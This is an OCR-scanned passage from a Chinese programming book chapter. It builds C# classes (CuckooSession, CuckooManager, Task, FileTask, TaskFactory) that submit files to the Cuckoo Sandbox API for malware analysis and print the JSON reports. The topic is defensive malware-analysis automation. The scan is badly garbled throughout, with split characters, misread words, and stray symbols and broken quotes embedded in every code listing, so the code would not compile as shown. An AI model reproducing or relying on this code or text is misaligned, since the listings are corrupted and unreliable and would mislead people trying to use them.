于 向 Cuckoo 上 和 送 要 分 析 的 文件 。 要 涵盖 这 些 不 同类 型 的 请 求 ， 我 们 需要 实现 两 种 ExecuteCommand () 方法 : 首先 ， 是 包含 
两 个 参数 的 简单 些 的 ExecuteCommand () 方法 ， 用 于 传统 的 请 求 ; 接着 ， 用 一 个 包含 三 个 参数 的 ExecuteCommand () 重 
载 该 方法 ， 将 其 用 于 分 段 请 求 。 两 个 方法 具有 同样 的 名 称 但 是 有 不 同 的 参数 ， 或 者 万 法 重 载 ， 人 在 C# 中 是 允许 的 。 这 是 一 个 很 好 
的 例子 ， 展 示 了 何 时 使 用 方法 重 载 而 不 是 用 一 个 可 接受 可 变 参数 的 方法 ， 因 为 尽管 使 用 同一 个 名 称 ， 但 用 于 每 类 请 求 的 万 法 相对 
来 说 是 不 一 样 的 。 稍 简单 些 的 ExecuteCommand () 方法 如 清单 8-6 所 示 。 


清单 8-6: 只 接受 URI 和 HTTP 方 法 作为 参数 的 简单 ExecuteCommand () 方法 


public JObject @ExecuteCommand(string uri, string method ) 


L 
HttpWebRequest req = (HttpWebRequest)WebRequest 


.@Create("http://" + this.Host + ":" + this.Port + uri); 
req.@Method = method; 


string resp = string.Empty; 
using (Stream str = req.GetResponse().GetResponseStream()) 
using (StreamReader rdr = new StreamReader(str)) 
resp = rdr.@ReadToEnd(); 


JObject obj = JObject.®@Parse(resp); 
return ob] ; 


} 


第 一 个 ExecuteCommand () 方法 @ 有 两 个 参数 : 请 求 的 URI 和 使 用 的 HTTP 方 法 (Get、POST、PUT 等 ) 。 在 用 
Create () @ 创 建 一 个 新 的 HTTP 请 求 并 设置 这 个 请 求 的 Method 属 性 @) 之 后 ， 发 起 HTTP 请 求 并 将 响应 读 @ 到 字符 串 中 。 最 后 ， 
将 返回 的 字符 串 按照 JJON 解 析 @ 并 返回 新 的 JJON 对 象 。 


重 载 的 ExecuteCommand () 方法 有 三 个 参数 : 请 求 的 URI、HTTP 方 法 ， 以 及 将 在 HTTP 分 段 请 求 中 发 送 的 参数 字典 。 分 
段 请 求 允许 向 Web 服 务 器 发 送 更 为 复杂 的 数据 ， 比 如 与 其 他 HTTP 参 数 一 起 发 送 的 二 进 制 文件 ， 这 正 是 我 们 要 使 用 的 方式 。 后 面 


的 清单 8-9 给 出 了 一 个 完整 的 分 段 请 求 。 清 单 8- 7 详细 说 明了 如 何 友 送 此 类 请 求 。 
清单 8-7: 友 起 分 段 (multipart) /表单 数据 (form-data) HTTP 请 求 的 重 载 EXxecuteCommand () 方法 


public JObject @ExecuteCommand(string uri, string method, IDictionary<string, object> parms) 


{ 
HttpWebRequest req = (HttpWebRequest)WebRequest 
.@Create("http://" + this.Host + ":" + this.Port + uri); 
req.@Method = method; 


string boundary = @String.Format("---------- {0:N}", Guid.NewGuid()); 
byte[ |] data = ©@CGetMultipartFormData(parms, boundary); 


req.ContentLength = data.Length; 
req.ContentType = @ multipatrt/form-data;j boundary=" + boundary; 


using (Stream parmStream = req.GetRequestStream()) 
parmStream. @Write(data, 0, data.Length); 


string resp = string.Empty; 
using (Stream str = req.GetResponse().GetResponseStream()) 
using (StreamReader rdr = new StreamReader(str)) 
resp = rdr.@ReadToEnd(); 


JObject obj = JObject.®@Parse(resp); 
return ob] ; 


} 


如 前 所 述 ， 第 二 种 较 复杂 的 ExecuteCommand () 方法 @ 有 三 个 参数 。 在 友 起 新 请 求 @ 并 设置 HTTP 方 法 @ 后 ， 我 们 用 
String.Format () @ 创 建 一 个 分 隔 待 ， 用 来 分 隔 分 段 形 式 的 表单 请 求 。 一 旦 创建 了 分 隔 符 ， 束 可 调用 
GetMultipartFormData () @ (后 面 马 上 实现 该 方法 ) 来 将 作为 第 三 个 参数 传 入 的 参数 字典 转换 为 使 用 新 分 隔 符 的 分 段 HTTP 
表单 。 


在 创建 分 段 HTTP 数 据 后， 我们 就 可 以 通过 基于 该 分 段 HTTP 数 据 来 设置 Content-Length 和 ContenType 请 求 属性 ， 从 而 完 
成 HTTP 请 求 设置 。 对 于 ContentType 属 性 ， 同 样 需要 附加 分 隔 竺 来 分 隔 HTTP 参 数 @)。 最 后 ， 我 们 可 向 HTTP 请 求 数据 流 写 分 
段 形 式 的 数据 并 读 取 @ 服 务 器 的 响应 。 收 到 服务 器 最 后 的 响应 后 ， 将 响应 按照 JSON 解 析 @ 并 返回 JSON 对 象 。 


这 两 个 ExecuteCommand () 方法 都 可 用 来 对 Cuckoo Sandbox API 执 行 APl 调 用 。 但 在 调用 API 新 点 有 前， 还 需要 一 些 额 外 
的 代码 。 


8.3.2 用 GetMultipartFormData () 万 法 创建 分 段 HTTP 数 据 


类 ， 因 此 我 们 需要 从 头 开始 创建 构建 HTTP 分 段 请 求 的 方法 。 构 建 分 段 HTTP 请 求 的 详细 技术 细节 有 点 超出 我 们 要 实现 的 范围 ， 
此 只 介绍 该 万 法 的 一 般 流程 。 访 方法 的 全 部 内 容 参 见 清 单 8-8 (去 掉 了 岩 入 的 注释 ) ， 该 方法 由 Brian 

Grinstead (http://www.briangrinstead.com/blog/multipart-form-post-in-c/) 编写 ， 后 被 整合 到 RestSharp 客 户 疹 
(http://restsharp.org/) 。 


清单 8-8: GetMultipartFormData () 方法 


private byte[ ] @CGetMultipartFormData(IDictionary<string, object> postParameters, string boundary) 
{ 

System.Text.Encoding encoding = System.Text.Encoding.ASCII; 

Stream formDataStream = new System.I0.MemoryStream(); 

bool needsCLRF = false; 


foreach (var param in postParameters) 


if (needsCLRF) 
formDataStream.Write(encoding.GetBytes("\r\n"), 0, encoding.GetByteCount("\r\n")); 


needsCLRF = true; 
if (param.Value is FileParameter) 


FileParameter fileToUpload = (FileParameter)param.Value; 
string header = string.Format("--{0}\r\nContent-Disposition: form-data; name=\"{1}\";" + 
"filename=\"{2}\";\r\nContent-Type: {3}\r\n\r\n", 
boundary, 
param.Key, 
fileToUpload.FileName ?? param.Key, 
fileToUpload.ContentType ?? "application/octet-stream"); 
formDataStream.Write(encoding.GetBytes(header), 0, encoding.GetByteCount(header)); 
formDataStream.Write(fileToUpload.File, 0, fileToUpload.File.Length); 
} 


else 
{ 
string postData = string.Format("--{0}\r\nContent-Disposition: form-data;" + 
"name=\"{1}\"\r\in\r\in{2}", 
boundary, 
param.Key, 
param.Value); 
formDataStream.Write(encoding.GetBytes(postData), 0, encoding.GetByteCount(postData)); 


} 
} 


string footer = “"\r\n--" + boundary + "--\r\n'; 
formDataStream.Write(encoding.GetBytes(footer), 0, encoding.GetByteCount(footer)); 


formDataStream.Position = 0; 

byte[ | formData = new byte[formDataStream.Length|; 
formDataStream.Read(formData, 0, formData.Length); 
formDataStream.Close(); 

return formData; 


在 GetMultipartFormData () 万 法 @ 中 ， 首 先 接受 两 个 参数 : 第 一 个 参数 是 参数 字典 以 及 各 目的 值 ， 这 些 值 需要 转换 为 分 
段 形式 ;第 二 个 参数 是 用 来 分 隔 请 求 中 文件 参数 的 字符 串 ， 从 而 可 顺利 解析 这 些 文件 参数 。 第 二 个 参数 被 称 作 分 隔 符 ， 这 个 参数 
会 告诉 API 用 这 个 分 隔 符 来 分 隔 HTTP 请 求 正 文 ， 然 后 将 每 一 段 作为 请 求 中 单独 的 参数 和 值 。 这 比较 难 想 象 ， 因 此 清单 8-9 给 出 了 
一 个 HTTP 分 段 表 单 请 求 的 详细 示例 。 


清单 8-9: HTTP 分 段 表 单 请 求 示 例 


POST / HTTP/1.1 

Host: localhost:8000 

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; TV:29.0) Gecko/20100101 Firefox/29.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

Content-Type: @multipart/form-data; 


boundary 包 = ------------------------ 9051914041544843365972754266 
Content-Length: 554 


ee 9051914041544843365972754266®@ 
Content-Disposition: form-data; @name= text 


text default®© 

A 9051914041544843365972754266@ 
Content-Disposition: form-data; name="file1"; filename="a.txt" 
Content-Type: text/plain 

Content of a.txt. 


es 9051914041544843365972754266@ 
Content-Disposition: form-data; name= file2 ; filename= a.htm] 
Content-Type: text/html 


《1!DOCTYPE html><title>Content of a.html.</title> 


----------- 9051914041544843365972754266--@ 


这 个 HTTP 请 求 与 我 们 正 要 构建 的 请 求 很 相似 ， 因 此 现在 指出 那些 在 GetMultipart-FormData () 方法 中 提 到 的 重要 部 分 
首先 ， 注 意 Content-Type 头 是 multipart/form-data@， 后 面 是 分 隔 符 @， 与 清单 8-7 中 设置 的 完全 一 样 。 在 整个 HTTP 请 求 
(@、@、@O、@) 中 将 一 直 用 这 个 分 隅 符 来 分 隅 每 个 HTTP 参 数 。 每 个 参数 都 有 一 个 参数 名 @@ 和 值 @。 
GetMultipartFormData () 方法 接受 通过 字典 参数 和 分 隔 符 参 数 传 入 的 参数 名 和 值 ， 然 后 将 它们 转 损 为 使 用 给 定 分 隔 符 分 隅 每 
个 参数 的 类 似 HTTP 请 求 。 


8.3.3 ”用 FileParameter 类 处 理 文件 数据 


为 了 向 Cuckoo 友 适 文件 或 要 分 析 的 恶意 文件 ， 我 们 需要 创建 一 个 用 来 存储 诸如 文件 类 型 、 文 件 名 称 以 及 文件 实际 内 容 之 类 
文件 数据 的 类 。 更 为 简洁 的 FileParameter 类 封 和 了 GetMultipartFormData () 方法 所 需 的 一 些 信 息 ， 如 清单 8-10 所 示 。 


清单 8-10: FileParameter 类 


public class @FileParameteT 


t 
public byte[]j File { get; set; } 
public string FileName { get; set; } 
public string ContentType { get; set; } 


public @FileParameter(byte[l |] file, string filename, string contenttype) 
' 


@File = file; 
@FileName = filename; 
©@ContentType = contenttype; 


} 
} 


FileParameter 类 Q@ 描 述 了 用 于 构建 HTTP 参 数 的 数据 ， 该 参数 包含 要 分 析 的 文件 。 这 个 类 的 构造 疯 数 接受 三 个 参数 : 包 
含 文 件 内 容 的 字 节 数组 、 文 件 名 称 以 及 内 容 类 型 。 随 后 每 个 参数 都 将 被 赋 给 对 应 的 类 属性 (@、Q@、G@) 。 


8.3.4 测试 CuckoosSession 及 支持 类 


到 目前 为 止 ， 我 们 可 用 一 个 简短 的 Main () 方法 来 测试 我 们 编写 的 代码 ，Main () 方法 用 API 请 求 Cuckoo SandBox 的 状 
人 态 。 在 8.2.2 节 中 ， 我 们 用 手动 实现 过 。 清 单 8-11 列 出 了 如 何 用 新 构建 的 CuckooSession 类 检查 Cuckoo 的 状态 。 


清单 8-11: 用 于 检索 Cuckoo Sandbox 状 态 的 Main () 方法 


public static void @Main(string[|] args) 
{ 


CuckooSession session = new @CuckooSession("127.0.0.1", 8090); 
JObject response = session.@ExecuteCommand("/cuckoo/status", "GET"); 
Console.@WritelLine(response.ToString()); 


} 


在 新 创建 的 Main () 方法 @ 中 ， 通 过 传 入 Cuckoo Sandbox 运 行 所 在 的 IP 地 址 和 端口 ， 我 们 首先 创建 了 一 个 
CuckooSession 对 象 @。 如 果 APIl 运 行 在 本 地 机 器 上 ， 则 IP 地 址 使 用 127.0.0.1 即 可 。 如 清单 8-3 所 示 ， 启 动 API 时 需 设 置 IP 和 闻 口 
(默认 是 8090) 。 使 用 该 新 会 话 ， 将 URI/cuckoo/status 作 为 第 一 个 参数 ，HTTP 方 法 GET 作 为 第 二 个 参数 ， 调 用 
ExecuteCommand () 方法 @。 然 后 用 WriteLine () 方法 @ 将 响应 写 到 屏幕 上 。 


如 清单 8-12 所 示 ， 运 行 Main () 方法 将 向 屏幕 打印 一 个 JSON 字 上 典 ， 输 出 Cuckoo 的 状态 信息 


清单 8-12: 测试 CuckooSession 类 以 打印 输出 Cuckoo Sandbox 当 前 状态 信息 


$ ./ch8 automating cuckoo.exe 


{ 
"cpuload": |[ 
0.0， 


0.03， 
0.05 
]， 
"diskspace": 1{ 
"analyses": { 
"free": 342524416000， 
"total": 486836101120， 
Used : 144311685120 
}， 
"binaries": { 
"free": 342524416000， 
"total": 486836101120， 
“used": 144311685120 


} 


}， 
hostname : “fdsa-E7450 ， 


"machines": { 
“avallable : 1， 
"total": 1 


上 
-memory : 85.542549616647932， 


"tasks": { 
"completed": 0， 
"pending": 0， 
Teported : 2， 
Tunning : 0， 
"total": 12 


}， 


Version : 2.0-IC2 


可 以 看 出 ， 为 检查 Cuckoo 状 态 ， 这 里 输出 的 JSJON 信 息 和 前 面 手 动 执行 API 命 令 的 结果 相同 。 


8.4 编写 CuckooManger 类 


实现 CuckooSession 类 以 及 其 他 辅助 类 之 后 ， 我 们 就 可 将 焦点 转 到 CuckooManager 类 上 ， 用 该 类 来 封装 几 个 简单 的 API 调 
用 。 如 清单 8-13 所 示 ， 我 们 从 其 构造 函数 开始 来 介绍 CuckooManager 类 。 


清单 8-13: 开始 介绍 CuckooManager 类 


public class @CuckooManager : @IDisposable 
{ 


CuckooSession ©@ session = null; 
public @CuckooManager(CuckooSession session) 


{ 


© session = session,; 


} 


CuckooManager 类 @ 从 实现 1Disposable 接 口 @ 开 始 ， 在 CuckooManager 类 运行 结束 时 我 们 将 用 该 接口 处 理 私 有 变量 


_sessionG@。 该 类 的 构造 函数 @ 只 有 一 个 参数 : 与 Cuckoo Sandbox 实 例 通信 时 使 用 的 会 话 。 传 递 给 构造 函数 的 这 个 参数 将 赋 给 
私有 变量 session@)， 这 样 后 面 实现 的 万 法 束 可 使 用 这 个 会 话 来 调用 这 些 方 法 所 指定 的 APl。 


8.4.1 编写 CreateTask () 方法 


CuckooManager 类 中 的 第 一 个 方法 是 CreateTask () ， 这 是 我 们 要 编写 的 最 复杂 的 管理 方法 。 如 清单 8-14 所 示 ， 通 过 上 明 
确 要 创建 的 任务 类 型 ， 发 起 所 需 的 HTTP 调 用 ，CreateTask () 方法 实现 了 一 个 HTTP 调 用 来 创建 一 个 新 任务 。 


清单 8-14: CreateTask () 方法 


public int @CreateTask(Task task ) 

{ 
string param = null, uri = "/tasks/create/"; 
object val = null; 
if @(task is FileTask) 


byte[ ] data; 
using (FileStream str = new @FileStream((task as FileTask) .Filepath， 
FileMode.Open, 
FileAccess.Read ) ) 
{ 
data = new byte[str.Length ] ; 
str.@Read(data, 0, data.Length); 


} 


param = file ; 
Uri += param; 
val = new ©@FileParameter(data, (task as FileTask).Filepath, 
"application/binary"); 
$ 


IDictionary<string, object> @parms = new Dictionary<string, object>(); 
parms .Add(param, val); 

parms .Add("package", task.Package); 

parms.Add("timeout", task.Timeout.ToString()); 

parms.Add("options", task.Options); 

parms .Add("machine", @task.Machine); 

parms.Add("platform", task.Platform); 

parms.Add("custom", task.Custom); 


parms.Add("memory", task.EnableMemoryDump.ToString()); 
parms.Add("enforce timeout", task.EnableEnforceTimeout.ToString()); 


JObject resp = session.@ExecuteCommand(uri, "POST", parms); 


return ©(int)resp["task id"|]; 


CreateTask () 方法 @ 首 先 检 查 传 入 的 任务 是 否 为 一 个 FileTask 类 @ (该 类 拉 述 一 个 文件 或 者 是 要 分 析 的 恶意 软件 ) 。 由 于 
Cuckoo Sandbox 不 仅仅 文 持 分 析 文 件 (比如 还 支持 URL) ， 所 以 通过 扩展 CreateTask () 方法 很 容易 就 能 创建 不 同类 型 的 
任务 。 如 果 该 任务 是 一 个 FileTask， 则 用 一 个 新 建 的 Filesteam () 打开 要 友 运 给 Cuckoo Sandbox 的 文件 ， 然 后 读 取 文件 内 容 


放 入 一 个 字 节 数组 。 一 旦 文件 读 取 完 成 @， 我 们 融 可 用 文件 名 、 文 件 字 节 数 以 及 内 容 类 型 (application/binary) 创建 一 个 新 的 


FileParameter 类 @)。 


然后 ， 在 一 个 新 Dictionary@ 里 面 设置 要 发 送 给 Cuckoo Sandbox 的 HTTP 参 数 。 这 些 HTTP 参 数 应 包含 创建 任务 所 需 的 信 
息 ， 在 Cuckoo Sandbox API 文 档 里 面 有 详细 说 明 。 这 些 参 数 允 许 我 们 更 改 默认 的 配置 项 ， 比 如 要 使 用 哪 一 个 虚拟 机 @。 最 后 ， 
使 用 字典 里 面 所 包含 的 参数 调用 ExecuteCommand () @ 方 法 来 创建 一 个 新 任务 ， 并 返回 @ 新 建 任 务 的 1D。 


8.4.2 ”任务 细节 及 报告 万 法 


要 提交 待 分 析 并 报告 的 文件 ， 还 需要 支持 其 他 几 个 APl 调 用 ， 如 清单 8-15 所 示 ， 这 些 方 法 要 比 CreateTask () 简单 得 多 。 我 
们 只 需要 创建 一 个 方法 来 展示 任务 细节 ， 两 个 方法 来 报告 任务 的 情况 ， 另 外 一 个 方法 来 清理 我 们 的 会 话 。 


清单 8-15: 检索 任务 信息 和 报告 的 一 些 辅助 方法 


public Task @CGetTaskDetails(int id) 
{ 


string uri = 四 /tasks/view/” + id; 
JObject resp = session.@ExecuteCommand(uri, "GET"); 
@return TaskFactory.CreateTask(resp[ "task" |); 


} 


public JObject @GCetTaskReport(int id) 


{ 
return GetTaskReport(id, @"json"); 


} 


public JObject @CGetTaskReport(int id, string type) 
{ 
string uri = @'/tasks/report/" + ld + / + type; 
return session.®@ExecuteCommand(uri, "GET"); 


} 
public void @Dispose() 
{ 
_session = null; 
} 


} 


要 实现 的 第 一 个 方法 是 GetTaskDetails () 方法 @,， 该 万 法 只 有 一 个 参数 ， 即 作为 任务 ID 的 变量 id。 首 先 通 过 将 1D 参数 附 加 
到 /task/view@ 创 建 对 其 友 起 HTTP 请 求 的 URI， 然 后 用 这 个 新 创建 的 URI 调 用 ExecuteCommand () @@。 访 病 操 返回 任务 的 一 
些 信息 ， 比 如 运行 任务 的 虚拟 机 名 称 以 及 任务 的 当前 状态 ,我 们 可 用 这 些 信息 来 监视 任务 执行 情况 直至 结束 。 最 后 ， 用 
TaskFatory.CreateTask () 方法 @ 将 API 返 回 的 JSON 任 务 转 为 C#Task 类 。 下 一 节 将 创建 该 类 。 


第 二 个 方法 是 一 个 简单 的 便利 性 方法 @@。 因 为 Cuckoo Sandbox 支 持 多 种 类 型 的 报告 (JJON、XML 等 ) ， 所 以 有 两 个 
GetTaskReport () 方法 ， 第 一 个 只 用 于 JSON 报 告 @。GetTaskReport () 方法 只 接受 要 报告 的 任务 1D 作 为 参数 ， 然 后 用 传 入 
的 同一 ID 调用 重 载 的 姐妹 方法 ， 但 该 方法 的 第 二 个 参数 指定 要 返回 JSON 类 型 的 报告 。 在 第 二 个 GetTask-Report () 方法 @ 
中 ， 任 务 ID 和 报告 类 型 作为 参数 传 入 ， 然 后 用 传 入 的 参数 构建 API 调 用 中 要 请 求 的 URI@。 这 个 新 URI 被 传 给 


ExecuteCommand () 方法 @)， 随 后 返回 从 Cuckoo Sandbox 获 得 的 报告 。 


最 后 ， 实 现 Dispose () 方法 @@， 该 方法 实现 了 IDisposable 接 口 。 该 方法 清理 用 来 与 API 通 信 的 会 话 ， 将 nul 赋 给 私有 变量 


_SeSsslon。 


8.4.3 ”创建 任务 抽象 类 


文 持 Cuckoosession 类 和 CuckooManager 类 的 是 Task 类 ， 访 类 是 一 个 抽象 类 ， 人 存放 着 给 定 任务 的 大 部 分 相关 信息 ， 从 而 
可 作为 属性 访问 这 些 信息 。 抽 象 Task 类 如 清单 8-16 所 示 。 


清单 8-16: 抽象 Task 类 


public abstract class @Task 


{ 
protected @Task(JToken token) 


. 
if (token != null) 


this.Addedon = @DateTime.Parse((string)token["added on" |]); 


if (token["completed on"].Type != JTokenType.Null) 
this.Completedon = @DateTime.Parse(token["completed on"].ToObject<string>()); 


this.Machine = (string)token["machine"]; 
this.Errors = token["errors"|.ToObject<ArrayList>(); 
this.Custom = (string)token["custom" |]; 
this.EnableEnforceTimeout = (bool)token["enforce timeout"]; 
this.EnableMemoryDump = (bool)token["memory"]; 
this.Guest = token[ "guest" |]; 
this.ID = (int)token["id"|]; 
this.Options = token["options"].ToString(); 
this.Package = (string)token["package"|]; 
this.Platform = (string)token["platform" |]; 
this.Priority = (int)token["priority"|]; 
this.SampleID = (int)token["sample id"]; 
this.Status = (string)token["status"]; 
this.Target = (string)token["target"|]; 
this.Timeout = (int)token[ "timeout”"] ; 

} 


public string Package { get; set; } 

public int Timeout { get; set; } 

public string Options { get; set; } 

public string Machine { get; set; } 

public string Platform { get; set; } 
public string Custom { get; set; } 

public bool EnableMemoryDump { get; set; } 
public bool EnableEnforceTimeout { get; set; } 
public ArrayList Errors { get; set; } 
public string Target { get; set; } 

public int SampleID { get; set; } 

public JToken Guest { get; set; } 

public int Priority { get; set; } 

public string Status { get; set; } 

public int ID { get; set; } 

public DateTime AddedOn { get; set; } 
public DateTime CompletedOn { get; set; } 


尽管 抽象 Task 类 Q@ 乍 一 看 很 复杂 ， 但 实际 上 该 类 所 包含 的 也 就 是 一 个 构造 溺 数 和 大 约 十 几 个 属性 。 构 造 水 数 @ 接 受 JToken 
作为 一 个 参数 ， 呈 oken 与 JObject 类 似 ， 是 一 个 专用 的 JSON 类 。 叮 oken 用 来 把 从 JSON 得 到 的 任务 细节 赋 给 C# 类 的 属性 。 构 造 
消 数 中 赋值 的 第 一 个 属性 是 AddedOn 属 性 。 使 用 DateTime.Parse () @@， 将 任务 创建 的 时 间 戳 从 字符 串 解析 为 DateTime 类 ， 
随后 赋 给 Addedon。CompletedOn 属 性 与 之 类 似 ， 同 样 使 用 DateTime.Parse () @ 和 存储 任务 结束 的 时 间 。 其 他 属性 用 从 
JSON 获 得 的 值 直接 赋值 ， 这 个 JSON 是 作为 参数 传 给 构造 函数 的 。 


8.4.4 排序 并 创建 不 同 的 类 类 型 


即使 我 们 只 实现 一 种 类 型 任务 (文件 分 析 任务 ) ， 但 实际 上 Cuckoo Sandbox 能 支持 的 任务 可 不 止 一 种 。FileTask 类 继承 自 
抽象 Task 类 ，FileTask 类 增加 了 一 个 新 属性 来 存储 要 发 送 给 Cuckoo 进 行 分 析 的 文件 路 径 。Cuckoo 支 持 的 另外 一 种 类 型 任务 是 
URL 任 务 ， 在 Web 浏 贤 器 中 打开 给 定 的 URL 然 后 分 析 友 生 的 事情 (如 果 站 点 上 有 过 路 式 漏 洞 利用 (drive-by exploit) 或 其 他 恶 
意 软 件 ) 。 


创建 FileTask 类 来 开启 文件 分 析 任 务 


FileTask 类 用 来 存储 对 某 一 文件 开始 进行 分 析 所 需 的 信息 。 如 清单 8-17 所 示 ， 由 于 该 类 从 我 们 刚 实现 的 Task 类 中 继承 了 大 部 
分 属性 ， 所 以 FileTask 类 非常 简洁 明了 。 


清单 8-17: 继承 自 Task 类 的 FileTask 类 


public class @FileTask : Task 


{ 
public @FileTask() : base(null) { } 


public ©@FileTask(JToken dict) : base(dict) { } 
public @string Filepath { get; set; } 
} 


继承 自前 述 Task 类 @ 的 FileTask 类 比较 简单 ， 该 类 使 用 了 一 些 C# 中 可 用 的 高 级 继承 技巧 。 该 类 实现 了 两 个 不 同 的 构造 卫 
数 ， 这 两 个 构造 函数 都 向 基础 Task 类 的 构造 函数 传递 参数 。 举 例 来 训 ， 第 一 个 构造 函数 @ 不 接受 任何 参数 ， 向 基 类 构造 函数 传 
递 null 值 。 这 使 得 我 们 可 拥有 一 个 不 需要 任何 参数 的 默认 构造 函数 。 第 二 个 构造 阔 数 @ 只 接受 一 个 JToken 类 作为 参数 ， 这 个 构 
造 国 数 直 接 将 JSON 参 数 传 给 基 类 的 构造 国 数 ， 基 类 的 构造 阔 数 将 其 赋 给 FileTask 类 要 从 Task 类 继承 的 属性 。 这 样 利 用 Cuckoo 
API 返 回 的 JJON ， 很 容易 束 能 创建 一 个 FileTask 类 。FileTask 类 中 有 但 通用 Task 类 中 没有 的 唯一 项 目 惑 是 Filepath 属 性 @， 该 属 
性 只 对 提交 文件 分 析 任务 有 用 。 


用 TaskFactory 类 确定 要 创建 的 任务 类 型 


Java 开 发 者 或 者 其 他 熟悉 面向 对 象 编程 的 人 可 能 早 残 知道 面向 对 象 开 友 中 的 工厂 模式 。 这 是 一 种 灵活 的 方式 ， 用 一 个 类 束 能 
创建 很 多 相似 但 最 终 类 型 不 同 的 类 (通常 所 有 的 类 都 继承 目 同 一 个 基 类 ， 它 们 也 可 实现 相同 的 接口 ) 。TaskFactory 类 (如 清单 
8-18 所 示 ) 用 来 将 在 API 响 应 中 由 Cuckoo Sandbox 返 回 的 JSON 任 务 转换 为 C#Task 类 ， 即 FileTask 类 或 者 其 他 方式 一 一 也 就 是 
说 ， 你 需要 额外 做 些 工 作 ， 才 能 实现 URL 任 务 ， 这 里 作为 课外 作业 了 。 


清单 8-18: 实现 了 面向 对 象 编程 中 常用 工厂 模式 的 TaskFactory 静 仿 类 


public static class @TaskFactory 


{ 
public static Task @CreateTask(JToken dict) 


{ 
Task task = null; 


@switch((string)dict["category" ]) 


case @ file : 
task = new 加 FileTask(dict ) ; 
break ; 
default: 
throw new Exception("Don't know category: 


+ dict["category" |); 
} 


return @task ; 


} 
} 


要 实现 的 最 后 一 个 类 是 TaskFactory 静 态 类 Q@@。 这 个 类 让 我 们 将 从 Cuckoo Sandbox 获 取 的 JSON 任 务 转 换 为 C# - FileTask 
对 象 。 如 果 在 未 来 需要 实现 其 他 类 型 的 任务 ， 仍 可 用 TaskFactory 来 处 理 那些 任务 的 创建 。TaskFactory 类 只 有 一 个 叫 作 
CreateTask () 的 静态 方法 @， 我 们 用 一 个 switch 语 句 @ 来 检查 任务 类 别 。 如 果 任 务 类 别 是 文件 任务 @)， 那 么 就 向 FileTask 构 造 
国 数 传递 Joken 任 务 @@， 然 后 返回 新 建 的 C# 任 务 @@。 尽 镶 本 书 不 会 使 用 其 他 的 文件 类 型 ， 但 是 你 可 用 这 个 switch 语 句 来 创建 不 
同类 型 的 Task， 比 如 基于 category 值 的 url 任 务 ， 然 后 返回 结果 。 


8.5 组合 在 一 起 
终于 可 以 开始 自动 化 开展 一 些 恶 意 软件 分 析 了 。 如 清单 8-19 所 示 ， 用 CuckooSession 和 和 CuckooManager 类 来 创建 文件 分 


析 任 务 、 监 视 任务 直至 结束 ， 然 后 将 任务 的 JSON 格 式 的 报告 输出 到 控制 从。 


清单 8-19: 将 CuckooSession 和 和 CuckooManager 类 组 合 到 一 起 的 Main () 方法 


public static void @Main(string[] args) 
{ 


CuckooSession session = new @CuckooSession("127.0.0.1", 8090); 
using (CuckooManager manager = new @CuckooManager(session)) 


FileTask task = new @FileTask(); 
task.@Filepath = “/var/www/payload.exe'; 


int taskID = manager.@CreateTask(task); 
Console.WriteLine("Created task: ”+ taskID); 


task = (FileTask)manager.@GetTaskDetails(taskID); 
while(task.Status == "pending" || task.Status == "running") 


Console.WriteLine("Waiting 30 seconds..."+task.Status); 
System.Threading.Thread.Sleep(30000); 
task = (FileTask)manager.GetTaskDetails(taskID); 


} 


if (task.@Status == "failure") 
{ 


Console.Error.WriteLine("There was an error:"); 
foreach (var error in task.Errors) 
Console.Error.WritelLine(error); 


return; 


} 


string report = manager.®@GetTaskReport(taskID).ToString(); 
Console. @WritelLine(report); 


} 
} 


在 Main () 方法 @ 中 ， 我 们 首先 创建 一 个 新 的 CuckooSession 实 例 @D， 在 发 起 API 请 求 时 将 要 连接 的 |P 地 址 和 端口 传 给 该 
实例 。 新 会 话 创建 后 ， 在 using 语 名 上 下 文中 创建 一 个 新 的 CuckooManager 对 象 @ 和 一 个 新 的 FileTask 对 象 @。 同 样 ， 将 任务 
的 Filepath 属 性 设置 为 文件 系统 中 要 分 析 的 可 执行 文件 的 路 径 。 如 果 要 测试 ， 可 以 用 Metasploit 的 msfvenom 生 成 有 效 载 荷 

(如 第 4 章 所 述 ) ， 或 者 使 用 在 第 4 章 中 自己 编写 的 一 些 有 效 载荷 。 在 用 要 扫描 的 文件 创建 FileTask 后 ， 就 可 将 任务 传 给 管理 器 的 
CreateTask () 方法 @， 并 仔 储 返回 的 ID 全 以 备 后 续 使 用 。 


任务 一 旦 创建 完成 ， 就 可 调用 GetTaskDetails () 方法 ,将 CreateTask () 方法 返回 的 任务 ID 传 给 GetTaskDetails () 
方法 。 当 调用 GetTaskDetails () 方法 的 时 候 ， 该 方法 将 返回 一 个 状态 。 在 本 例 中 ， 我 们 只 关注 两 种 状态 : 挂 起 (pending) 或 
者 失败 (failure) 。 只 要 GetTask-Details () 返回 挂 起 状态 ， 将 打印 输出 一 个 友好 的 消息 ， 告 知 用 户 任务 还 没有 执行 完 ， 然 后 
在 再 次 调用 GetTaskDetails () 前 让 应 用 程序 休眠 30 秒 。 如 果 状 态 不 是 挂 起 ， 为 了 防止 分 析 过 程 中 出 错 ， 需 要 检查 任务 状态 是 
否 为 失败 @@。 如 果 任 务 的 状态 是 失败 ， 就 打印 输出 Cuckoo Sandbox 返 回 的 错误 消息 。 


不 管 怎样 ， 只 要 状态 不 是 失败 ， 我 们 束 假 设 任务 顺利 完成 分 析 ， 并 根据 从 Cuckoo Sandbox 检 查 友 现 的 情况 创建 一 个 新 报 
告 。 然 后 把 任务 ID 作为 唯一 的 参数 传 给 GetTask-Report () 并 调用 该 方法 @， 最 后 用 WriteLine () 同 控 制 谷 屏 幕 打印 输出 报告 
©. 


8.6 ”测试 应 用 程序 


采用 这 种 自动 化 方法 ， 我 们 可 最 终 调 用 Cuckoo Sandbox 实 例 来 运行 和 分 析 潜 在 的 恶意 Windows 可 执行 程序 ， 并 随后 检索 
任务 运行 后 输出 的 报告 ， 如 清单 8-20 所 示 。 记 住 ， 要 以 管理 员 权 限 运 行 该 实例 。 


清单 8-20: Cuckoo Sandbox JSON 格 式 的 分 析 报 告 


$ ./ch8 automating cuckoo.exe 
Waiting 30 seconds...pending 


"To 全 和 4 

Category : file ， 

“SCOTe : 0.0， 

package :  ， 

‘started : 2016-05-19 15:50:44 ， 

Youte : none ， 

"Custom : ™"" 

"machine": { 
"status": "stopped", 
-name : “"@cuckoo1', 
"label": “cuckoo1 ， 
manageTr : VirtualBox ， 


"started on : “2016-05-19 15:56:44 ， 
